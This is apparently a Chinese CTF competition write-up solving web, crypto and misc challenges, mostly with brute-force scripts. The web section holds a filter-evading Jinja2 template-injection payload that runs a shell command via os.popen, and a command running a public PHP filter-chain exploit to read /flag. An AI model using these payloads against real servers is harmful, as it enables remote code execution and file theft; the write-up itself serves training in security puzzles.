Web
easy_flask
简单尝试一下{{2*"1"}},确认为jinja2模板注入
判断 os 模块 位置在 133
{{()['__cla'+'ss__'].__base__['__subcl'+'asses__']()[133]}}
{{''['__cla'+'ss__'].__base__['__subcl'+'asses__']()[133].__init__.__globals__['pop'+'en']('cat flag').read()}}}
file_copy
github脚本直接跑
https://github.com/synacktiv/php_filter_chains_oracle_exploit?tab=readme-ov-file
python filters_chain_oracle_exploit.py --target url --file '/flag' --parameter path
Crypto
你是小哈斯
直接一条一条爆破,当时没做出来是赛后,借鉴网上的脚本
import hashlib
import itertools
import string
# 需要破解的 CRC 哈希值
hash_list = [
"356a192b7913b04c54574d18c28d46e6395428ab",
"da4b9237bacccdf19c0760cab7aec4a8359010b0",
"77de68daecd823babbb58edb1c8e14d7106e83bb",
"1b6453892473a467d07372d45eb05abc2031647a",
"ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4",
"c1dfd96eea8cc2b62785275bca38ac261256e278",
"902ba3cda1883801594b6e1b452790cc53948fda",
"fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f",
"0ade7c2cf97f75d009975f4d720d1fa6c19f4897",
"b6589fc6ab0dc82cf12099d1c2d40ab994e8410c",
"3bc15c8aae3e4124dd409035f32ea2fd6835efc9",
"21606782c65e44cac7afbb90977d8b6f82140e76",
"22ea1c649c82946aa6e479e1ffd321e4a318b1b0",
"aff024fe4ab0fece4091de044c58c9ae4233383a",
"58e6b3a414a1e090dfc6029add0f3555ccba127f",
"4dc7c9ec434ed06502767136789763ec11d2c4b7",
"8efd86fb78a56a5145ed7739dcb00c78581c5375",
"95cb0bfd2977c761298d9624e4b4d4c72a39974a",
"51e69892ab49df85c6230ccc57f8e1d1606caccc",
"042dc4512fa3d391c5170cf3aa61e6a638f84342",
"7a81af3e591ac713f81ea1efe93dcf36157d8376",
"516b9783fca517eecbd1d064da2d165310b19759",
"4a0a19218e082a343a1b17e5333409af9d98f0f5",
"07c342be6e560e7f43842e2e21b774e61d85f047",
"86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
"54fd1711209fb1c0781092374132c66e79e2241b",
"60ba4b2daa4ed4d070fec06687e249e0e6f9ee45",
"d1854cae891ec7b29161ccaf79a24b00c274bdaa",
"7a81af3e591ac713f81ea1efe93dcf36157d8376",
"53a0acfad59379b3e050338bf9f23cfc172ee787",
"042dc4512fa3d391c5170cf3aa61e6a638f84342",
"a0f1490a20d0211c997b44bc357e1972deab8ae3",
"53a0acfad59379b3e050338bf9f23cfc172ee787",
"4a0a19218e082a343a1b17e5333409af9d98f0f5",
"07c342be6e560e7f43842e2e21b774e61d85f047",
"86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
"54fd1711209fb1c0781092374132c66e79e2241b",
"c2b7df6201fdd3362399091f0a29550df3505b6a",
"86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
"a0f1490a20d0211c997b44bc357e1972deab8ae3",
"3c363836cf4e16666669a25da280a1865c2d2874",
"4a0a19218e082a343a1b17e5333409af9d98f0f5",
"54fd1711209fb1c0781092374132c66e79e2241b",
"27d5482eebd075de44389774fce28c69f45c8a75",
"5c2dd944dde9e08881bef0894fe7b22a5c9c4b06",
"13fbd79c3d390e5d6585a21e11ff5ec1970cff0c",
"07c342be6e560e7f43842e2e21b774e61d85f047",
"395df8f7c51f007019cb30201c49e884b46b92fa",
"11f6ad8ec52a2984abaafd7c3b516503785c2072",
"84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
"7a38d8cbd20d9932ba948efaa364bb62651d5ad4",
"e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98",
"d1854cae891ec7b29161ccaf79a24b00c274bdaa",
"6b0d31c0d563223024da45691584643ac78c96e8",
"5c10b5b2cd673a0616d529aa5234b12ee7153808",
"4a0a19218e082a343a1b17e5333409af9d98f0f5",
"07c342be6e560e7f43842e2e21b774e61d85f047",
"86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
"54fd1711209fb1c0781092374132c66e79e2241b",
"60ba4b2daa4ed4d070fec06687e249e0e6f9ee45",
"54fd1711209fb1c0781092374132c66e79e2241b",
"86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
"6b0d31c0d563223024da45691584643ac78c96e8",
"58e6b3a414a1e090dfc6029add0f3555ccba127f",
"53a0acfad59379b3e050338bf9f23cfc172ee787",
"84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
"22ea1c649c82946aa6e479e1ffd321e4a318b1b0",
"e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98",
"53a0acfad59379b3e050338bf9f23cfc172ee787",
"042dc4512fa3d391c5170cf3aa61e6a638f84342",
"a0f1490a20d0211c997b44bc357e1972deab8ae3",
"042dc4512fa3d391c5170cf3aa61e6a638f84342",
"a0f1490a20d0211c997b44bc357e1972deab8ae3",
"53a0acfad59379b3e050338bf9f23cfc172ee787",
"84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
"11f6ad8ec52a2984abaafd7c3b516503785c2072",
"95cb0bfd2977c761298d9624e4b4d4c72a39974a",
"395df8f7c51f007019cb30201c49e884b46b92fa",
"c2b7df6201fdd3362399091f0a29550df3505b6a",
"3a52ce780950d4d969792a2559cd519d7ee8c727",
"86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
"a0f1490a20d0211c997b44bc357e1972deab8ae3",
"3c363836cf4e16666669a25da280a1865c2d2874",
"4a0a19218e082a343a1b17e5333409af9d98f0f5",
"54fd1711209fb1c0781092374132c66e79e2241b",
"27d5482eebd075de44389774fce28c69f45c8a75",
"5c2dd944dde9e08881bef0894fe7b22a5c9c4b06",
"13fbd79c3d390e5d6585a21e11ff5ec1970cff0c",
"07c342be6e560e7f43842e2e21b774e61d85f047",
"395df8f7c51f007019cb30201c49e884b46b92fa",
"11f6ad8ec52a2984abaafd7c3b516503785c2072",
"84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
"7a38d8cbd20d9932ba948efaa364bb62651d5ad4",
"e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98",
"d1854cae891ec7b29161ccaf79a24b00c274bdaa",
"6b0d31c0d563223024da45691584643ac78c96e8",
"5c10b5b2cd673a0616d529aa5234b12ee7153808",
"4a0a19218e082a343a1b17e5333409af9d98f0f5",
"07c342be6e560e7f43842e2e21b774e61d85f047",
"86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
"54fd1711209fb1c0781092374132c66e79e2241b",
"60ba4b2daa4ed4d070fec06687e249e0e6f9ee45",
"54fd1711209fb1c0781092374132c66e79e2241b"
]
candidates = set()
for i in range(10000):
candidates.add(str(i))
lowercase = string.ascii_lowercase
for length in range(1, 4):
for combo in itertools.product(lowercase, repeat=length):
candidates.add("".join(combo))
uppercase = string.ascii_uppercase
for length in range(1, 4):
for combo in itertools.product(uppercase, repeat=length):
candidates.add("".join(combo))
symbols = "!@#$%^&*()-_=+[]{},.;:\"'`~<>?/\\|"
for sym in symbols:
candidates.add(sym)
candidates.add(" ")
candidates.add("\t")
candidates.add("\n")
sha1_dict = {}
print("[*] 准备生成 SHA-1 字典,共有候选明文数量 =", len(candidates), "请稍候...")
for plain in candidates:
h = hashlib.sha1(plain.encode("utf-8")).hexdigest()
sha1_dict[h] = plain
print("[*] 字典生成完成。开始匹配...")
matched_plaintexts = ""
for hval in hash_list:
if hval in sha1_dict:
matched_plaintexts += sha1_dict[hval] # 直接拼接
print(f"{hval} => {sha1_dict[hval]}")
else:
print(f"{hval} => [未匹配]")
# 输出拼接结果
print("\n[*] 匹配的明文拼接结果:")
print(matched_plaintexts)
print("[*] 匹配完成。若还有未匹配,则可进一步扩大字典或检查是否有特殊格式。")
爆破结果
flag{game_cqb_isis_cxyz}
通往哈希的旅程
试了很多种最后用的sha1爆破出来了
import hashlib
target_hash = "ca12fd8250972ec363a16593356abb1f3cf3a16d"
for num in range(18800000000, 18900000000):
num_str = str(num)
hash_object = hashlib.sha1(num_str.encode())
hash_value = hash_object.hexdigest()
if hash_value == target_hash:
print(f"找到匹配的号码: {num_str}")
break
else:
print("未找到匹配的号码")
flag{18876011645}
Misc
简单镜像提取
流量包文件分离一下发现有一个镜像文件
解压后直接用工具镜像提取发现有个销售报表被删除的
恢复后打开就可以直接看到flag
flag{E7A10C15E26AA5750070EF756AAA1F7C}
简单算数
根据提示进行爆破
ciphertext = "ys~xdg/m@]mjkz@vl@z~lf>b"
for key in range(128):
plaintext =""
for char in ciphertext:
plaintext += chr(ord(char)^ key)
print(f"Key: {key}, Plaintext: {plaintext}")
flag{x0r_Brute_is_easy!}
压力大,写个脚本吧
脚本把所有的压缩包解压
import zipfile
import os
import base64
import re
# 设置压缩包的路径
base_dir = "path_to_your_zip_files"# 你存放压缩包的文件夹路径
flag_file = os.path.join(base_dir, "flag.txt") # 保存密码的 flag.txt 文件
# 递归解压压缩包
defextract_zip(zip_path, target_dir):
try:
# 获取 zip 文件名(去掉扩展名)
zip_file_name = os.path.basename(zip_path)
# 使用正则提取压缩包中的数字编号(假设压缩包格式为 zip_XX.zip)
match = re.match(r"zip_(\d+)\.zip", zip_file_name)
if match:
# 提取编号并构建密码文件名
zip_number = match.group(1)
password_file = os.path.join(target_dir, f"password_{zip_number}.txt")
# 打印密码文件路径,帮助调试
print(f"密码文件路径: {password_file}")
if os.path.exists(password_file):
with open(password_file, 'r') as pf:
password_base64 = pf.read().strip() # 读取密码内容并去除多余的空格
# 对密码进行 Base64 解码
password = base64.b64decode(password_base64)
# 将密码写入 flag.txt
with open(flag_file, 'a') as flag_f:
flag_f.write(f"{password_base64}")
print(f"密码 {zip_number} 已写入 flag.txt")
else:
print(f"密码文件 {password_file} 不存在!")
return
else:
print(f"无法从文件名提取编号: {zip_file_name}")
return
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
# 解压所有文件
zip_ref.extractall(target_dir, pwd=password)
print(f"成功解压: {zip_path}")
# 查找嵌套的 zip 文件
for file in zip_ref.namelist():
if file.endswith('.zip'):
nested_zip_path = os.path.join(target_dir, file)
print(f"找到嵌套的压缩包: {nested_zip_path}")
# 递归解压嵌套的压缩包
extract_zip(nested_zip_path, target_dir)
except Exception as e:
print(f"解压失败: {zip_path}, 错误: {e}")
# 解压最外层的压缩包(例如 zip_100.zip)
zip_file = "zip_99.zip"# 你要解压的最外层压缩包的名字
zip_path = os.path.join(base_dir, zip_file)
# 创建目标文件夹
ifnot os.path.exists(base_dir):
os.makedirs(base_dir)
# 创建或清空 flag.txt 文件
if os.path.exists(flag_file):
os.remove(flag_file)
# 开始解压
extract_zip(zip_path, base_dir)
在最后一个压缩包有个提示,对各个txt文件分析,发现0的password是89504e47
直接合并去除末尾无用的FG,得到图片
flag{_PASSWORDs_is_fl@g!_}
See anything in these pics
aztec扫码,识别提示是5尝试爆破加密的压缩包
flag{opium_00pium}
🌸🌸欢迎各个师傅加入下方交流群共同学习进步,公众号也会更新比赛总结🌸🌸
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论